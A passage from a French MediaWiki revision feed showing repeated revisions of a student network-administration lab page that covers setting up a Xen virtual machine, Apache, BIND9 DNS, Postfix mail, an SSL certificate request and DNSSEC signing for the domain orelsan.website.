&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; DNSSEC &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35642</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35642"/>
				<updated>2016-12-06T09:09:59Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Installation boite mail&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Générer une demande de certificat en SHA 2&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; DNSSEC &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35641</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35641"/>
				<updated>2016-12-06T09:09:38Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
